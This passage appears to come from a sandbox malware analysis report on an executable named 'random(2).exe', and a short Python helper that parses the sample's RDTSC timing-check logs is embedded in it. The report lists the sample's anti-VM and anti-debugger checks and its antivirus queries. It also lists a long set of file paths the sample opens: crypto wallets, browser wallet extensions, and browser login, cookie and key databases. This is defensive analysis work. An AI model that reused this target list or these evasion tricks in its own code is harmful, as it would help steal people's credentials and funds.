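    r"Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0014 second address: 51A001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A001A second address: 51A003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 58E5236Dh 0x00000010 mov ch, 89h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc",
    r"Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A003D second address: 51A0041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A039A second address: 51A0407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jg 00007F8384F721B2h 0x0000000c pushad 0x0000000d jmp 00007F83146B40D8h 0x00000012 pushfd 0x00000013 jmp 00007F83146B40D2h 0x00000018 sub al, 00000038h 0x0000001b jmp 00007F83146B40CBh 0x00000020 popfd 0x00000021 popad 0x00000022 js 00007F83146B4151h 0x00000028 jmp 00007F83146B40D6h 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc",
    r"Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0423 second address: 51A0461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F83857671F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 pushfd 0x00000015 jmp 00007F8314EA918Bh 0x0000001a adc cl, 0000000Eh 0x0000001d jmp 00007F8314EA9199h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc",
]

# Tolerates both "random(2).exeRDTSC ..." (fused) and "random(2).exe RDTSC ..." (spaced).
LINE_RE = re.compile(
    r"Source:\s*(?P<source>.*?)\s*RDTSC instruction interceptor:\s*"
    r"First address:\s*(?P<first>[0-9A-Fa-f]+)\s+second address:\s*(?P<second>[0-9A-Fa-f]+)"
    r"\s+instructions:\s*(?P<body>.*)$"
)
# Each instruction is prefixed by its byte offset in the window ("0x0000002d cmp ...").
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")

# Heuristic filler set: register save/restore around the read and unconditional jumps.
FILLER = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp", "nop"}
# Net stack-pointer change in 32-bit slots, to see whether the filler balances out.
STACK_DELTA = {"push": -1, "pop": 1, "pushad": -8, "popad": 8, "pushfd": -1, "popfd": 1}


def parse_window(line):
    """Return one parsed rdtsc-to-rdtsc window, or None if the line is not one."""
    m = LINE_RE.search(line)
    if not m:
        return None
    instrs = [t.strip() for t in OFFSET_RE.split(m["body"]) if t.strip()]
    if len(instrs) < 2 or instrs[0] != "rdtsc" or instrs[-1] != "rdtsc":
        return None
    inner = instrs[1:-1]  # what actually ran between the two time reads
    mnems = [i.split()[0] for i in inner]
    first, second = int(m["first"], 16), int(m["second"], 16)
    return {
        "source": m["source"].strip(),
        "first": first,
        "second": second,
        "gap": second - first,
        "count": len(inner),
        "filler": sum(1 for x in mnems if x in FILLER),
        "real": [i for i, x in zip(inner, mnems) if x not in FILLER],
        "stack_delta": sum(STACK_DELTA.get(x, 0) for x in mnems),
        "mnemonics": Counter(mnems),
    }


def analyse(lines):
    """Parse all interceptor lines and summarise gaps, filler share and read chains."""
    windows = [w for w in map(parse_window, lines) if w]
    # Consecutive windows chain when one ends where the next starts:
    # a run of back-to-back time reads.
    chains, run = [], 1
    for a, b in zip(windows, windows[1:]):
        if a["second"] == b["first"]:
            run += 1
        else:
            chains.append(run)
            run = 1
    if windows:
        chains.append(run)
    total = sum(w["count"] for w in windows)
    filler = sum(w["filler"] for w in windows)
    gaps = [w["gap"] for w in windows]
    return {
        "windows": windows,
        "median_gap": statistics.median(gaps) if gaps else 0,
        "max_gap": max(gaps, default=0),
        "filler_ratio": filler / total if total else 0.0,
        "longest_chain": max(chains, default=0),
        "real_instructions": [i for w in windows for i in w["real"]],
    }


if __name__ == "__main__":
    r = analyse(SAMPLE_LINES)
    print(f"{len(r['windows'])} windows, median gap {r['median_gap']} bytes, "
          f"max gap {r['max_gap']}, filler {r['filler_ratio']:.0%}, "
          f"longest chain {r['longest_chain']}")
    for i in r["real_instructions"]:
        print("  real:", i)
```

Feed it every interceptor line saved from the report rather than the five embedded ones. Short gaps, a high filler share and long chains are what a timing probe wrapped in obfuscator junk looks like; the `real` list per window is the handful of instructions worth following in a disassembler.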
                Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 63FC8D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 63FBD3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 63D396 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 80689A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 862B81 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\random(2).exe TID: 4480 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\random(2).exe TID: 2552 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\random(2).exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: random(2).exe, random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547185152.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557681819.00000000011CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557681819.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546978449.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595466704.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547540496.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1309813518.00000000011A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                Source: random(2).exe, 00000000.00000002.1595283299.0000000001177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\random(2).exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\random(2).exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\random(2).exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\random(2).exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exe File opened: NTICE
                Source: C:\Users\user\Desktop\random(2).exe File opened: SICE
                Source: C:\Users\user\Desktop\random(2).exe File opened: SIWVID
                Source: C:\Users\user\Desktop\random(2).exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\random(2).exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\random(2).exe Process queried: DebugPort
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: EProgram Manager
                Source: C:\Users\user\Desktop\random(2).exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                Source: random(2).exe, random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582541164.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593831702.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595725997.0000000001232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\random(2).exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR
                Source: Yara match | File source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: random(2).exe | String found in binary or memory: Wallets/Electrum-LTC
                Source: random(2).exe | String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: random(2).exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: random(2).exe | String found in binary or memory: window-state.json
                Source: random(2).exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: random(2).exe | String found in binary or memory: ExodusWeb3
                Source: random(2).exe | String found in binary or memory: Wallets/Ethereum
                Source: random(2).exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: random(2).exe | String found in binary or memory: keystore
                Source: random(2).exe | String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
